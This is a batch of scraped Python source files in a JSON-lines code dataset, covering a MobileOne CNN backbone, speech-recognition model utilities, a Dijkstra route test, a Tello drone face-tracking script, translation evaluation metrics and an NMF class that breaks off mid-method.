arhr and hr\n metrics = {}\n metrics[\"ndcg@100\"] = tmf.retrieval_normalized_dcg(tensor, hold, 100)\n metrics[\"hr@1\"] = tmf.retrieval_hit_rate(tensor, hold, 1)\n metrics[\"hr@10\"] = tmf.retrieval_hit_rate(tensor, hold, 10)\n self.log_dict(metrics, on_epoch=True)\n return metrics\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters())\n return optimizer\n\n @property\n def trainable_parameters(self):\n total_params = sum(p.numel() for p in self.parameters())\n return total_params\n\n def save(self, path=DEFAULT_PATH):\n torch.save(self.state_dict(), path)\n\n def load(self, path=DEFAULT_PATH):\n self.load_state_dict(torch.load(path, map_location=self.device))\n\n\nif __name__ == \"__main__\":\n # data-loaders\n cutoff = lambda x: 1 if x >= 3.5 else 0 # function for generating implicit ratings\n\n dataset = UserRatingsDataset(\n \"data/ml-1m/ratings.csv\", threshold=20, rating_function=cutoff\n )\n train, valid, test = dataset.tvt_datasets()\n\n train = DataLoader(train, batch_size=100, num_workers=1)\n valid = DataLoader(valid, batch_size=100, num_workers=1)\n test = DataLoader(test, batch_size=100, num_workers=1)\n\n # model definition\n model = Model(dataset.n_items, 200)\n\n # traning\n trainer = pl.Trainer(\n max_epochs=200,\n log_every_n_steps=10,\n callbacks=[EarlyStopping(monitor=\"ndcg@100\", mode=\"max\", patience=20)],\n )\n trainer.fit(model, train, valid)\n trainer.test(model, test)\n","repo_name":"ratinac-nikola/deepRec","sub_path":"vae/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"17112129880","text":"import torch.nn as nn\nimport numpy as np\nimport torch\nimport copy\n\n# from torchvision.models import MobileNetV2\n\n'''\nCode from https://github.com/shoutOutYangJie/MobileOne/blob/main/mobileone.py\nWe using it since it has pretrained model\n\nthis also adopt by YOLOv7 as a detection backbone\n'''\n\n\ndef conv_bn(in_channels, out_channels, kernel_size, stride, padding, groups=1):\n result = nn.Sequential()\n result.add_module(\n \"conv\",\n nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n groups=groups,\n bias=False,\n ),\n )\n result.add_module(\"bn\", nn.BatchNorm2d(num_features=out_channels))\n return result\n\n\nclass DepthWiseConv(nn.Module):\n def __init__(self, inc, kernel_size, stride=1):\n super().__init__()\n padding = 1\n if kernel_size == 1:\n padding = 0\n # self.conv = nn.Sequential(\n # nn.Conv2d(inc, inc, kernel_size, stride, padding, groups=inc, bias=False,),\n # nn.BatchNorm2d(inc),\n # )\n self.conv = conv_bn(inc, inc, kernel_size, stride, padding, inc)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass PointWiseConv(nn.Module):\n def __init__(self, inc, outc):\n super().__init__()\n # self.conv = nn.Sequential(\n # nn.Conv2d(inc, outc, 1, 1, 0, bias=False),\n # nn.BatchNorm2d(outc),\n # )\n self.conv = conv_bn(inc, outc, 1, 1, 0)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass MobileOneBlock(nn.Module):\n def __init__(\n self,\n in_channels,\n out_channels,\n k,\n stride=1,\n dilation=1,\n padding_mode=\"zeros\",\n deploy=False,\n use_se=False,\n ):\n super(MobileOneBlock, self).__init__()\n self.deploy = deploy\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.deploy = deploy\n kernel_size = 3\n padding = 1\n assert kernel_size == 3\n assert padding == 1\n self.k = k\n padding_11 = padding - kernel_size // 2\n\n self.nonlinearity = nn.ReLU()\n\n if use_se:\n # self.se = SEBlock(out_channels, internal_neurons=out_channels // 16)\n ...\n else:\n self.se = nn.Identity()\n\n if deploy:\n self.dw_reparam = nn.Conv2d(\n in_channels=in_channels,\n out_channels=in_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n groups=in_channels,\n bias=True,\n padding_mode=padding_mode,\n )\n self.pw_reparam = nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n stride=1,\n bias=True,\n )\n\n else:\n # self.rbr_identity = nn.BatchNorm2d(num_features=in_channels) if out_channels == in_channels and stride == 1 else None\n # self.rbr_dense = conv_bn(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, padding=padding, groups=groups)\n # self.rbr_1x1 = conv_bn(in_channels=in_channels, out_channels=out_channels, kernel_size=1, stride=stride, padding=padding_11, groups=groups)\n # print('RepVGG Block, identity = ', self.rbr_identity)\n self.dw_bn_layer = (\n nn.BatchNorm2d(in_channels)\n if out_channels == in_channels and stride == 1\n else None\n )\n for k_idx in range(k):\n setattr(\n self,\n f\"dw_3x3_{k_idx}\",\n DepthWiseConv(in_channels, 3, stride=stride),\n )\n self.dw_1x1 = DepthWiseConv(in_channels, 1, stride=stride)\n\n self.pw_bn_layer = (\n nn.BatchNorm2d(in_channels)\n if out_channels == in_channels and stride == 1\n else None\n )\n for k_idx in range(k):\n setattr(\n self, f\"pw_1x1_{k_idx}\", PointWiseConv(in_channels, out_channels)\n )\n\n def forward(self, inputs):\n if self.deploy:\n x = self.dw_reparam(inputs)\n x = self.nonlinearity(x)\n x = self.pw_reparam(x)\n x = self.nonlinearity(x)\n return x\n\n if self.dw_bn_layer is None:\n id_out = 0\n else:\n id_out = self.dw_bn_layer(inputs)\n\n x_conv_3x3 = []\n for k_idx in range(self.k):\n x = getattr(self, f\"dw_3x3_{k_idx}\")(inputs)\n # print(x.shape)\n x_conv_3x3.append(x)\n x_conv_1x1 = self.dw_1x1(inputs)\n # print(x_conv_1x1.shape, x_conv_3x3[0].shape)\n # print(x_conv_1x1.shape)\n # print(id_out)\n x = id_out + x_conv_1x1 + sum(x_conv_3x3)\n x = self.nonlinearity(self.se(x))\n\n # 1x1 conv\n if self.pw_bn_layer is None:\n id_out = 0\n else:\n id_out = self.pw_bn_layer(x)\n x_conv_1x1 = []\n for k_idx in range(self.k):\n x_conv_1x1.append(getattr(self, f\"pw_1x1_{k_idx}\")(x))\n x = id_out + sum(x_conv_1x1)\n x = self.nonlinearity(x)\n return x\n\n # Optional. This improves the accuracy and facilitates quantization.\n # 1. Cancel the original weight decay on rbr_dense.conv.weight and rbr_1x1.conv.weight.\n # 2. Use like this.\n # loss = criterion(....)\n # for every RepVGGBlock blk:\n # loss += weight_decay_coefficient * 0.5 * blk.get_cust_L2()\n # optimizer.zero_grad()\n # loss.backward()\n def get_custom_L2(self):\n # K3 = self.rbr_dense.conv.weight\n # K1 = self.rbr_1x1.conv.weight\n # t3 = (self.rbr_dense.bn.weight / ((self.rbr_dense.bn.running_var + self.rbr_dense.bn.eps).sqrt())).reshape(-1, 1, 1, 1).detach()\n # t1 = (self.rbr_1x1.bn.weight / ((self.rbr_1x1.bn.running_var + self.rbr_1x1.bn.eps).sqrt())).reshape(-1, 1, 1, 1).detach()\n\n # l2_loss_circle = (K3 ** 2).sum() - (K3[:, :, 1:2, 1:2] ** 2).sum() # The L2 loss of the \"circle\" of weights in 3x3 kernel. Use regular L2 on them.\n # eq_kernel = K3[:, :, 1:2, 1:2] * t3 + K1 * t1 # The equivalent resultant central point of 3x3 kernel.\n # l2_loss_eq_kernel = (eq_kernel ** 2 / (t3 ** 2 + t1 ** 2)).sum() # Normalize for an L2 coefficient comparable to regular L2.\n # return l2_loss_eq_kernel + l2_loss_circle\n ...\n\n # This func derives the equivalent kernel and bias in a DIFFERENTIABLE way.\n # You can get the equivalent kernel and bias at any time and do whatever you want,\n # for example, apply some penalties or constraints during training, just like you do to the other models.\n # May be useful for quantization or pruning.\n def get_equivalent_kernel_bias(self):\n # kernel3x3, bias3x3 = self._fuse_bn_tensor(self.rbr_dense)\n # kernel1x1, bias1x1 = self._fuse_bn_tensor(self.rbr_1x1)\n # kernelid, biasid = self._fuse_bn_tensor(self.rbr_identity)\n # return kernel3x3 + self._pad_1x1_to_3x3_tensor(kernel1x1) + kernelid, bias3x3 + bias1x1 + biasid\n\n dw_kernel_3x3 = []\n dw_bias_3x3 = []\n for k_idx in range(self.k):\n k3, b3 = self._fuse_bn_tensor(getattr(self, f\"dw_3x3_{k_idx}\").conv)\n # print(k3.shape, b3.shape)\n dw_kernel_3x3.append(k3)\n dw_bias_3x3.append(b3)\n dw_kernel_1x1, dw_bias_1x1 = self._fuse_bn_tensor(self.dw_1x1.conv)\n dw_kernel_id, dw_bias_id = self._fuse_bn_tensor(\n self.dw_bn_layer, self.in_channels\n )\n dw_kernel = (\n sum(dw_kernel_3x3)\n + self._pad_1x1_to_3x3_tensor(dw_kernel_1x1)\n + dw_kernel_id\n )\n dw_bias = sum(dw_bias_3x3) + dw_bias_1x1 + dw_bias_id\n # pw\n pw_kernel = []\n pw_bias = []\n for k_idx in range(self.k):\n k1, b1 = self._fuse_bn_tensor(getattr(self, f\"pw_1x1_{k_idx}\").conv)\n # print(k1.shape)\n pw_kernel.append(k1)\n pw_bias.append(b1)\n pw_kernel_id, pw_bias_id = self._fuse_bn_tensor(self.pw_bn_layer, 1)\n\n pw_kernel_1x1 = sum(pw_kernel) + pw_kernel_id\n pw_bias_1x1 = sum(pw_bias) + pw_bias_id\n return dw_kernel, dw_bias, pw_kernel_1x1, pw_bias_1x1\n\n def _pad_1x1_to_3x3_tensor(self, kernel1x1):\n if kernel1x1 is None:\n return 0\n else:\n return torch.nn.functional.pad(kernel1x1, [1, 1, 1, 1])\n\n def _fuse_bn_tensor(self, branch, groups=None):\n if branch is None:\n return 0, 0\n if isinstance(branch, nn.Sequential):\n kernel = branch.conv.weight\n bias = branch.conv.bias\n running_mean = branch.bn.running_mean\n running_var = branch.bn.running_var\n gamma = branch.bn.weight\n beta = branch.bn.bias\n eps = branch.bn.eps\n else:\n assert isinstance(branch, nn.BatchNorm2d)\n # if not hasattr(self, 'id_tensor'):\n input_dim = self.in_channels // groups # self.groups\n if groups == 1:\n ks = 1\n else:\n ks = 3\n kernel_value = np.zeros(\n (self.in_channels, input_dim, ks, ks), dtype=np.float32\n )\n for i in range(self.in_channels):\n if ks == 1:\n kernel_value[i, i % input_dim, 0, 0] = 1\n else:\n kernel_value[i, i % input_dim, 1, 1] = 1\n self.id_tensor = torch.from_numpy(kernel_value).to(branch.weight.device)\n\n kernel = self.id_tensor\n running_mean = branch.running_mean\n running_var = branch.running_var\n gamma = branch.weight\n beta = branch.bias\n eps = branch.eps\n std = (running_var + eps).sqrt()\n t = (gamma / std).reshape(-1, 1, 1, 1)\n return kernel * t, beta - running_mean * gamma / std\n\n def switch_to_deploy(self):\n dw_kernel, dw_bias, pw_kernel, pw_bias = self.get_equivalent_kernel_bias()\n\n self.dw_reparam = nn.Conv2d(\n in_channels=self.pw_1x1_0.conv.conv.in_channels,\n out_channels=self.pw_1x1_0.conv.conv.in_channels,\n kernel_size=self.dw_3x3_0.conv.conv.kernel_size,\n stride=self.dw_3x3_0.conv.conv.stride,\n padding=self.dw_3x3_0.conv.conv.padding,\n groups=self.dw_3x3_0.conv.conv.in_channels,\n bias=True,\n )\n self.pw_reparam = nn.Conv2d(\n in_channels=self.pw_1x1_0.conv.conv.in_channels,\n out_channels=self.pw_1x1_0.conv.conv.out_channels,\n kernel_size=1,\n stride=1,\n bias=True,\n )\n\n self.dw_reparam.weight.data = dw_kernel\n self.dw_reparam.bias.data = dw_bias\n self.pw_reparam.weight.data = pw_kernel\n self.pw_reparam.bias.data = pw_bias\n\n for para in self.parameters():\n para.detach_()\n self.__delattr__(\"dw_1x1\")\n for k_idx in range(self.k):\n self.__delattr__(f\"dw_3x3_{k_idx}\")\n self.__delattr__(f\"pw_1x1_{k_idx}\")\n if hasattr(self, \"dw_bn_layer\"):\n self.__delattr__(\"dw_bn_layer\")\n if hasattr(self, \"pw_bn_layer\"):\n self.__delattr__(\"pw_bn_layer\")\n if hasattr(self, \"id_tensor\"):\n self.__delattr__(\"id_tensor\")\n self.deploy = True\n\n\nclass MobileOneNet(nn.Module):\n def __init__(\n self, blocks, ks, channels, strides, width_muls, num_classes=None, deploy=False\n ):\n super().__init__()\n\n self.stage_num = len(blocks)\n # self.stage0 = MobileOneBlock(3, int(channels[0] * width_muls[0]), ks[0], stride=strides[0], deploy=deploy)\n self.stage0 = nn.Sequential(\n nn.Conv2d(3, int(channels[0] * width_muls[0]), 3, 2, 1, bias=False),\n nn.BatchNorm2d(int(channels[0] * width_muls[0])),\n nn.ReLU(),\n )\n in_channels = int(channels[0] * width_muls[0])\n for idx, block_num in enumerate(blocks[1:]):\n idx += 1\n module = []\n out_channels = int(channels[idx] * width_muls[idx])\n for b_idx in range(block_num):\n stride = strides[idx] if b_idx == 0 else 1\n block = MobileOneBlock(\n in_channels, out_channels, ks[idx], stride, deploy=deploy\n )\n in_channels = out_channels\n module.append(block)\n setattr(self, f\"stage{idx}\", nn.Sequential(*module))\n\n if num_classes is not None:\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc1 = nn.Sequential(\n nn.Linear(\n out_channels,\n num_classes,\n ),\n )\n\n def forward(self, x):\n # for s_idx in range(self.stage_num):\n # x = getattr(self, f'stage{s_idx}')(x)\n x0 = self.stage0(x)\n # print(x0[0,:,0,0])\n # return x0\n x1 = self.stage1(x0)\n x2 = self.stage2(x1)\n x3 = self.stage3(x2)\n x4 = self.stage4(x3)\n x5 = self.stage5(x4)\n assert x5.shape[-1] == 7\n x = self.avg_pool(x5)\n x = torch.flatten(x, start_dim=1) # b, c\n x = self.fc1(x)\n return x\n\n\ndef make_mobileone_s0(deploy=False):\n blocks = [1, 2, 8, 5, 5, 1]\n strides = [2, 2, 2, 2, 1, 2]\n ks = [4, 4, 4, 4, 4, 4] if deploy is False else [1, 1, 1, 1, 1, 1]\n width_muls = [0.75, 0.75, 1, 1, 1, 2] # 261 M flops\n channels = [64, 64, 128, 256, 256, 512, 512]\n num_classes = 1000\n\n model = MobileOneNet(blocks, ks, channels, strides, width_muls, num_classes, deploy)\n return model\n\n\ndef repvgg_model_convert(model: torch.nn.Module, do_copy=True, input=None, output=None):\n if do_copy:\n model = copy.deepcopy(model)\n for module in model.modules():\n if hasattr(module, \"switch_to_deploy\"):\n module.switch_to_deploy()\n print(\"swith done. Checking....\")\n deploy_model = make_mobileone_s0(deploy=True)\n deploy_model.eval()\n deploy_model.load_state_dict(model.state_dict())\n if input is not None:\n o = deploy_model(x)\n # print(o)\n # print(output)\n print((output - o).sum())\n # if save_path is not None:\n # torch.save(model.state_dict(), save_path)\n return deploy_model\n","repo_name":"lucasjinreal/nb","sub_path":"nb/torch/backbones/mobileone.py","file_name":"mobileone.py","file_ext":"py","file_size_in_byte":14813,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"62"} +{"seq_id":"26227103415","text":"import abc\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom data.data_utils import PHNS\nfrom settings.hparam import hparam as hp\nfrom data.data_loader import TrainVoiceDataset, TestVoiceDataset\n\n\nclass Model(nn.Module):\n \"\"\"\n Bsae Class to build SR model\n \"\"\"\n def __init__(self):\n super(Model, self).__init__()\n\n @staticmethod\n def data_loader(mode):\n if mode == 'train':\n dataset = TrainVoiceDataset()\n elif mode == 'test':\n dataset = TestVoiceDataset()\n else:\n raise NotImplementedError('%s mode is not implemented ! ' % mode)\n\n data_loader = DataLoader(dataset, batch_size=hp.train.batch_size,\n shuffle=(mode == 'train'), num_workers=hp.num_workers, drop_last=False)\n return data_loader\n\n @staticmethod\n def calc_output(net):\n ppgs = F.softmax(net / hp.train.t, dim=-1)\n _, preds_ppg = torch.max(net, dim=-1) # return arg_max\n return ppgs, preds_ppg\n\n @staticmethod\n def loss(mfcc, logits_ppg, y_ppg):\n is_target = torch.sign(torch.abs(torch.sum(mfcc, dim=-1))) # indicator: (N, T)\n # flatten\n logits_ppg = logits_ppg.view(-1, len(PHNS))\n y_ppg = y_ppg.view(-1)\n loss = F.cross_entropy(logits_ppg, y_ppg, reduce=False)\n loss = loss.view(is_target.size()[0], -1)\n loss *= is_target\n return torch.mean(loss)\n\n @staticmethod\n def accuracy(pred_ppg, y_ppg):\n target = torch.sign(torch.abs(y_ppg))\n target = target.data.cpu().numpy()\n num_hits = torch.eq(pred_ppg, y_ppg).data.cpu().numpy()\n num_hits = np.sum(num_hits * target)\n num_targets = np.sum(target)\n return float(num_hits / num_targets), num_hits, num_targets\n\n @staticmethod\n def topk_accuracy(logit, y, topk=3):\n \"\"\"\n calculate topk accuracy\n :param logit: shape (N, Time Steps, The Number of Phonemes)\n :param y: shape (N, Time Steps)\n :return: topk accuracy only\n \"\"\"\n _, topk_var = logit.topk(topk, dim=-1)\n topk_arr = topk_var.data.cpu().numpy()\n y_arr = y.data.cpu().numpy()\n\n target = torch.sign(torch.abs(y))\n target = target.data.cpu().numpy()\n cor = 0.\n numb = np.sum(target)\n\n for b in range(y_arr.shape[0]): # batch size\n for j, (pred, label) in enumerate(zip(topk_arr[b], y_arr[b])):\n if not target[b, j]:\n continue\n if label in pred:\n cor += 1\n return cor / numb, cor, numb\n\n @staticmethod\n def confusion_matrix(logit_ppg, y_ppg):\n \"\"\"\n calculate and get confusion matrix as numpy array\n :param pred_ppg: shape (N, Time Steps, The Number of Phonemes)\n :param y_ppg: shape(N, Time Steps)\n :return: numpy array (NP, NP)\n \"\"\"\n _, preds_ppg = torch.max(logit_ppg, dim=-1)\n pred_arr = preds_ppg.data.cpu().numpy()\n y_ppg = y_ppg.data.cpu().numpy()\n n = len(PHNS)\n confusion_matrix = np.zeros((n, n))\n for b in range(y_ppg.shape[0]): # batch size\n for pred, label in zip(pred_arr[b], y_ppg[b]):\n confusion_matrix[pred, label] += 1\n return confusion_matrix\n","repo_name":"AppleHolic/PytorchSR","sub_path":"models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"62"} +{"seq_id":"1355463114","text":"import xlrd\nfrom Agent.graph import GraphInput\nfrom Agent.problem import Problem\nfrom Dijkstra.dijkstra import Dijkstra\n\n\ndef build_solution_path(problem):\n\n start = problem.start\n goal = problem.goal\n result = []\n\n while goal != None and goal.get_city() != start.get_city():\n result.insert(0, goal)\n goal = goal.get_previous()\n\n result.insert(0, start)\n return result\n\n\n# Obtain nodes from graph excel sheet.\n# nodes = GraphInput().sheetImport(\"Agent/Graph.xlsx\") # Romania graph...\n\nnodes = GraphInput().sheetImport(\"Agent/PR_Graph.xlsx\") # Puerto Rico graph...\n\n# Creating graph dictionary to be bounded to its corresponding problem.\n# Note this collection is necessary for the Dijkstra's algorithm implementation.\ngraph = {}\n\nfor node in nodes:\n graph[node.get_city()] = node\n\n# Define start and end nodes for test.\n\n# Romania start and end nodes...\n# start_node = nodes[00] # Arad\n# goal_node = nodes[12] # Bucharest\n\n# Puerto Rico start and end nodes...\nstart_node = nodes[1] # Mayagüez\ngoal_node = nodes[10] # Caguas\n\n# Then we use those nodes to define the problem.\nproblem = Problem(start_node, goal_node, graph)\n\nsolver = Dijkstra()\nelapsed_time = solver.search(problem)\nroute = build_solution_path(problem)\n\nroute_time = 0\nfor i in range(0, len(route) - 1):\n # Define two nodes for calculating time between them.\n current_node = route[i]\n next_node = route[i + 1]\n\n # Find the adjacency between current and next.\n for edge in current_node.get_edges():\n if edge.get_destination().get_city() == next_node.get_city():\n route_time += edge.get_distance() / edge.get_speed_limit() + edge.get_traffic_delay()\n break\n\nprint(\"ROUTE TIME FOR DIJKSTRA: \", route_time)\nprint(\"ELAPSED TIME FOR DIJSKTRA: \", elapsed_time)\nprint(\"PATH CHOSEN BY DIJKSTRA: \", route)\n","repo_name":"pedrorivera40/Torpedo","sub_path":"TorpedoBackend/dijkstra_test1.py","file_name":"dijkstra_test1.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"17120151621","text":"import cv2\nimport numpy as np\nfrom djitellopy import tello\nimport time\nimport KeyPressModule as kp\nimport cvzone\n\n\n# 임계값 설정\nthres = 0.65\nnmsThres = 0.2 #0.2\n\nclassNames = []\n# 사물 감지를 위한 object dataSet\nclassFile = \"Resources/coco.names\"\n#classNames 에 하나씩 읽어오기\nwith open(classFile, 'rt') as f:\n classNames = f.read().split('\\n')\nprint(classNames)\nconfigPath = 'Resources/ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'\nweightPath = 'Resources/frozen_inference_graph.pb'\n\n#네트워크 불러오기 opencv 딥러닝 실행하기 위해서는\nnet = cv2.dnn_DetectionModel(weightPath, configPath)\n\n#set dnn_detectionModel\nnet.setInputSize(320, 320)\nnet.setInputScale(1.0 / 127.5)\nnet.setInputMean((127.5, 127.5, 127.5))\n#opencv BGR를 RGB로 교체\nnet.setInputSwapRB(True)\n\n#키보드 설정\nkp.init()\n#tello 연결\nme = tello.Tello()\n#배터리 표시\nme.connect()\n# 드론 위도우 창에 보여주기 위해 stream\nprint(me.get_battery())\n\nme.streamoff()\nme.streamon()\n\n# 이륙하기\n# me.takeoff()\n# 속도 초기값 설정\n# me.send_rc_control(0, 0, 0, 0)\n# time.sleep(2)\n\n#화면 사이즈 조정\nw, h = 720, 680\n#훈련을 통해 거리유지의 최적의 값을 찾아냄\nfbRange = [5000, 8000]\npid = [0.4, 0.4, 0]\npError = 0\ncap = cv2.VideoCapture(0) #위치 조정해복;\n\ndef findFace(img):\n #classifier 이용해서 분류\n faceCasecade = cv2.CascadeClassifier(\"Resources/haarcascade_frontalface_default.xml\")\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #얼굴 검출 #1.2 와 8이 최고!\n faces = faceCasecade.detectMultiScale(imgGray, 1.2, 8)\n\n # center x ,y\n myFaceListC = []\n myFaceListArea = []\n #물체 검출\n #confThreshold에 임계값 넣어주기 nmsThreshold\n classIds, confs, bbox = net.detect(img, confThreshold=thres, nmsThreshold=nmsThres)\n try:\n for classId, conf, box in zip(classIds.flatten(), confs.flatten(), bbox):\n cvzone.cornerRect(img, box)\n #putText object name class name start 1 conf는 0.xx 이므로 곱하기 100 하고 소수점 2자리까지 반올림\n cv2.putText(img, f'{classNames[classId - 1].upper()} {round(conf * 100, 2)}',\n #x:0 y:0 에서 +10 +30\n (box[0] + 10, box[1] + 30), cv2.FONT_HERSHEY_COMPLEX,\n 1, (0, 255, 0), 2)\n # for coconames object detection\n except:\n pass\n\n #face 의 좌표정보를 받고 이용\n for (x, y, w, h) in faces:\n #얼굴 위치 표시\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cx = x + w // 2\n cy = y + h // 2\n area = w * h\n #중앙점 표시\n cv2.circle(img, (cx, cy), 10, (0, 255, 0), cv2.FILLED)\n myFaceListC.append([cx, cy])\n myFaceListArea.append(area)\n #\n if len(myFaceListArea) != 0:\n\n i = myFaceListArea.index(max(myFaceListArea))\n return img, [myFaceListC[i], myFaceListArea[i]]\n else:\n return img, [[0, 0], 0]\n\n\ndef trackFace(info, w, pid, pError):\n # 얼굴 영역 벗어나면 드론 위치 수정하기\n area = info[1]\n x, y = info[0]\n fb = 0\n\n error = x - w // 2\n speed = pid[0] * error + pid[1] * (error - pError)\n speed = int(np.clip(speed, -30, 30))\n #5000~8000 사이일떄 유지\n if area > fbRange[0] and area < fbRange[1]:\n\n fb = 0\n print(\"between\",area)\n\n #8000 이상일떄 얼굴이 커지므로 드론 back\n elif area > fbRange[1]: # 8000\n fb = -20\n print(\"over\", area)\n time.sleep(0.5)\n me.send_rc_control(0, fb, 0, speed)\n\n\n #5000 이하일떄 얼굴이 작아지므로 드론 forward\n elif area < fbRange[0] and area != 0: # 5000\n fb = 20\n print(\"under\", area)\n time.sleep(0.5)\n me.send_rc_control(0, fb, 0, speed)\n\n\n\n\n if x == 0:\n speed = 0\n error = 0\n # me.send_rc_control(0, fb, 0, speed)\n\n return error\n\n#키보드로 속도 조절\ndef getKeyboardInput():\n lr, fb, ud, yv = 0, 0, 0, 0\n speed = 50\n\n if kp.getKey(\"LEFT\"): lr = -speed\n elif kp.getKey(\"RIGHT\"): lr = speed\n\n if kp.getKey(\"UP\"): fb = speed\n elif kp.getKey(\"DOWN\"): fb = -speed\n\n if kp.getKey(\"w\"): ud = speed\n elif kp.getKey(\"s\"): ud = -speed\n\n if kp.getKey(\"a\"): yv = -speed\n elif kp.getKey(\"d\"): yv = speed\n\n if kp.getKey(\"q\"):\n me.land()\n\n\n if kp.getKey(\"t\"): me.takeoff()\n\n if kp.getKey(\"z\"):\n cv2.imwrite(f'Resources/Images/{time.time()}.jpg',img)\n\n\n return [lr, fb, ud, yv]\n\n# cap = cv2.VideoCapture(0) #위치 조정해복;\n\nwhile True:\n # _, img = cap.read()\n\n vals = getKeyboardInput()\n me.send_rc_control(vals[0], vals[1], vals[2], vals[3])\n img = me.get_frame_read().frame\n img = cv2.resize(img, (w, h))\n img, info = findFace(img)\n pError = trackFace(info, w, pid, pError)\n # print(\"center\",info[0],\"Area\",info[1])\n cv2.imshow(\"Output\", img)\n\n if cv2.waitKey(1) & kp.getKey(\"q\"):\n me.land()\n cv2.destroyAllWindows()\n break\n","repo_name":"hp0724/Drone_Project_with_pose_estimation","sub_path":"FaceTracking_ObjectDetection.py","file_name":"FaceTracking_ObjectDetection.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"28727708751","text":"from collections import Counter\nimport numpy as np\nfrom nltk import ngrams\nimport nltk.translate.bleu_score as bleu\n\ndef word_accuracy_oov(sentence_list, word_dict):\n size = 0\n count = 0\n for std, dia, inf in sentence_list:\n word_dict_std = std.split()\n word_list_dia = dia.split()\n word_list_inf = inf.split()\n for i in range(len(word_list_dia)):\n if word_dict_std[i] not in word_dict:\n #print(word_dict_std[i], word_list_dia[i], word_list_inf[i])\n size = size + 1\n if word_list_dia[i] == word_list_inf[i]:\n count = count + 1\n\n return count / size\n\ndef word_accuracy(sentence_list):\n size = 0\n count = 0\n\n for std, dia, inf in sentence_list:\n word_list_dia = dia.split()\n word_list_inf = inf.split()\n for i in range(len(word_list_dia)):\n size = size + 1\n if word_list_dia[i] == word_list_inf[i]:\n count = count + 1\n\n return count / size\n\ndef sentence_accuracy(sentence_list):\n size = len(sentence_list)\n count = 0\n\n for std, dia, inf in sentence_list:\n if dia == inf:\n count = count + 1\n return count / size\n\ndef bleu_score(sentence_list, n_gram=4):\n weights = [1./ n_gram for _ in range(n_gram)]\n \n try:\n smt_func = bleu.SmoothingFunction()\n score = 0.0\n \n for _, dia, inf in sentence_list:\n score += bleu.sentence_bleu([dia.split()],\n inf.split(),\n weights,\n smoothing_function=smt_func.method2)\n if len(sentence_list) == 0: \n return 0\n else :\n return score / len(sentence_list)\n except Exception as ex:\n print(ex)\n return 0\n\n\n","repo_name":"NUGO-NLP/korean-standard-to-dialect","sub_path":"baseline/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"62"} +{"seq_id":"34078419961","text":"import numpy as np\nimport time\n\n\ndef timemeasure(func):\n def wrapper(*args, **kargs):\n start_time = time.perf_counter()\n result = func(*args, **kargs)\n end_time = time.perf_counter()\n execution_time = end_time - start_time\n print(f'Proc-time: {execution_time}')\n return result\n return wrapper\n\nclass NMF2D():\n def __init__(self, n_basis, n_frames, n_pitches, n_iter,\n init_W=None, H_sparsity=0.0):\n self.n_basis = n_basis\n self.n_frames = n_frames\n self.n_pitches = n_pitches\n self.n_iter = n_iter\n self.init_W = init_W\n self.err = [0.0 for k in range(0, n_iter)]\n self.eps = np.spacing(1)\n self.H_penalty = H_sparsity\n self.H_norm_order = 0.5\n\n def __init_WH(self, V):\n self.Vmax = np.max(V)\n self.Ones = np.ones(V.shape)\n self.n_row, self.n_col = V.shape\n init_H = 0.5 + 0.5*np.random.random((self.n_basis, self.n_pitches, self.n_col))\n init_W = 0.5*np.random.random((self.n_row, self.n_basis, self.n_frames))\n init_W[:,:,0] = 0.5*np.ones((self.n_row, self.n_basis))\n\n return init_W, init_H \n \n def __W_regularization(self, W, order=2):\n return 0.0#np.tile(self.W_penalty*np.linspace(0, 1.0, self.n_frames)**order, (self.n_row, self.n_basis, 1))\n\n def __H_regularization(self, H):\n return self.H_penalty * self.__norm(H, (self.H_norm_order-2))\n \n def __update_W(self, V, W, H, order=2.0):\n VL, _ = self.__compute_VL(V, W, H)\n W_num, W_denom = np.zeros(W.shape), np.zeros(W.shape)\n W_penalty = self.__W_regularization(W)\n \n for t in range(0, self.n_frames):\n for p in range(0, self.n_pitches):\n VLp = self.__shift(VL, p, \"up\")\n HtpT = self.__shift(H[:,p,:], t, \"right\").T\n W_num[:,:,t] += np.dot(VLp, HtpT)\n W_denom[:,:,t] += np.dot(self.Ones, HtpT)\n W_new = np.clip(W*(W_num / (W_denom) + W_penalty), 0.0, self.Vmax)\n return W_new\n \n def __update_H(self, V, W, H):\n VL, _ = self.__compute_VL(V, W, H)\n H_num, H_denom = np.zeros(H.shape), np.zeros(H.shape)\n H_penalty = self.__H_regularization(H)\n \n for p in range(0, self.n_pitches):\n for t in range(0, self.n_frames):\n VLt = self.__shift(VL, t, \"left\")\n WtT = self.__shift(W[:,:,t], p, \"down\").T\n H_num[:,p,:] += np.dot(WtT, VLt)\n H_denom[:,p,:] += np.dot(WtT, self.Ones)\n H_new = np.clip(H*(H_num / (H_denom + H_penalty + self.eps)), 0.0, self.Vmax)\n \n return H_new\n \n def __norm(self, X, order):\n return 